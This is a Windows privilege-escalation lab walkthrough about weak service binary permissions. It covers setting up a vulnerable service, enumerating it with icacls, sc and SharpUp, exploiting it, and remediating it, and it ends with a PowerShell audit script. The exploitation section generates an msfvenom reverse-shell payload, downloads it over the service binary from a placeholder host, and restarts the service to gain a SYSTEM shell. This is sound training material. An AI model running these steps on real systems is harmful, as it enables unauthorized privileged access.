Weak Service Binary Permissions is a vulnerability caused by insufficiently restrictive permissions on service executables. An adversary can exploit it to modify the service executable, gaining unauthorized access or potentially elevating privileges on the system.
- Open PowerShell with local Administrator privileges and use the following command to create a new folder:
mkdir "C:\Program Files\CustomSrv2\"
- Download the file Service2.exe to the 'C:\Program Files\CustomSrv2' directory.
- Grant modify privileges to BUILTIN\Users on the service binary:
icacls "C:\Program Files\CustomSrv2\Service2.exe" /grant BUILTIN\Users:M
- Install the new Service:
New-Service -Name "Vulnerable Service 2" -BinaryPathName "C:\Program Files\CustomSrv2\Service2.exe" -DisplayName "Vuln Service 2" -Description "My Custom Vulnerable Service 2" -StartupType Automatic
- Edit the new service's permissions so that BUILTIN\Users can control it:
cmd.exe /c 'sc sdset "Vulnerable Service 2" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWP;;;BU)'
Outcome:
- Verify the new service (services.msc):
- Manually start the service from the service panel, or reboot the machine, since the service is set to start automatically at boot.
ℹ️ If you want to uninstall the new service, use the following command:
Remove-Service -Name "Vulnerable Service 2"
Another way to set up the lab with the 'Weak Service Binary Permissions' vulnerability is to use the custom PowerShell script named WeakServiceBinaryPermissions.ps1.
- Open PowerShell with local Administrator privileges and run the script:
.\WeakServiceBinaryPermissions.ps1
Outcome:
- Manually start the service from the service panel, or reboot the machine, since the service is set to start automatically at boot.
ℹ️ If you want to uninstall the new service, use the following command:
Remove-Service -Name "Vulnerable Service 2"
To perform manual enumeration of the Weak Service Binary Permissions vulnerability, you can use the following steps:
- Open a command prompt and use the following command to enumerate the permissions of the service binary:
icacls "C:\Program Files\CustomSrv2\Service2.exe"
Outcome:
- Use the following command to find out the START_TYPE and SERVICE_START_NAME:
sc qc "Vulnerable Service 2"
Outcome:
- Use the following command to find out the STATE and its attributes:
sc query "Vulnerable Service 2"
Outcome:
ℹ️ Finally, as you can see:
- BUILTIN\Users can modify Service2.exe.
- The service starts automatically when the machine boots.
- The service runs as Local System.
- The service is running.
To run the SharpUp tool and perform an enumeration of the Weak Service Binary Permissions vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit ModifiableServiceBinaries
Outcome:
To abuse this vulnerability you should follow these steps:
- If the service is running and you have permissions to stop it:
sc stop "Vulnerable Service 2"
Outcome:
- Create a malicious exe file with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > Service2.exe
- Open a listener on your Kali machine.
- Transfer and overwrite the Service2.exe file with the malicious binary:
iwr -Uri http://<ip>:<port>/Service2.exe -Outfile "C:\Program Files\CustomSrv2\Service2.exe"
- Start the service with the following command or reboot the machine:
sc start "Vulnerable Service 2"
- Verify the reverse shell on your Kali machine:
To defend against Weak Service Binary Permissions vulnerabilities, restrict the permissions on service executables so that low-privileged users cannot modify them. This limits unauthorized access and strengthens security measures:
icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users
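A defender-side check for the condition this lab creates, as an added example that is not part of the original lab or its WeakServiceBinaryPermissions.ps1 script: it lists every service whose binary grants write-type rights to Everyone, Authenticated Users or BUILTIN\Users. The function names and the choice of SIDs and rights are assumptions of this example.

```powershell
# Added example: audit service binaries for ACEs that let low-privileged groups write to them.
# Well-known SIDs are used so the check does not depend on the OS display language.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-5-32-545'   # BUILTIN\Users
)
# Rights that allow replacing or tampering with the file (all but the last two are part of Modify).
$writeRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {          # hypothetical helper name
    param([string]$PathName)
    # PathName may be quoted and may carry arguments; return the executable only.
    if ($PathName -match '^\s*"([^"]+)"')     { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)\b')  { return $Matches[1] }
    return $null
}

function Get-WeakBinaryAce {              # hypothetical helper name
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    # Explicit and inherited ACEs, with identities returned as SIDs.
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivSids -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) { $ace }
    }
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc = $_
    $bin = Get-ServiceBinaryPath $svc.PathName
    if ($bin -and (Test-Path -LiteralPath $bin)) {
        foreach ($ace in Get-WeakBinaryAce $bin) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                Binary    = $bin
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}
```

On the lab machine, the "Vulnerable Service 2" entry should appear with Identity S-1-5-32-545 until the icacls fix above is applied; an empty result means no service binary is writable by those three groups.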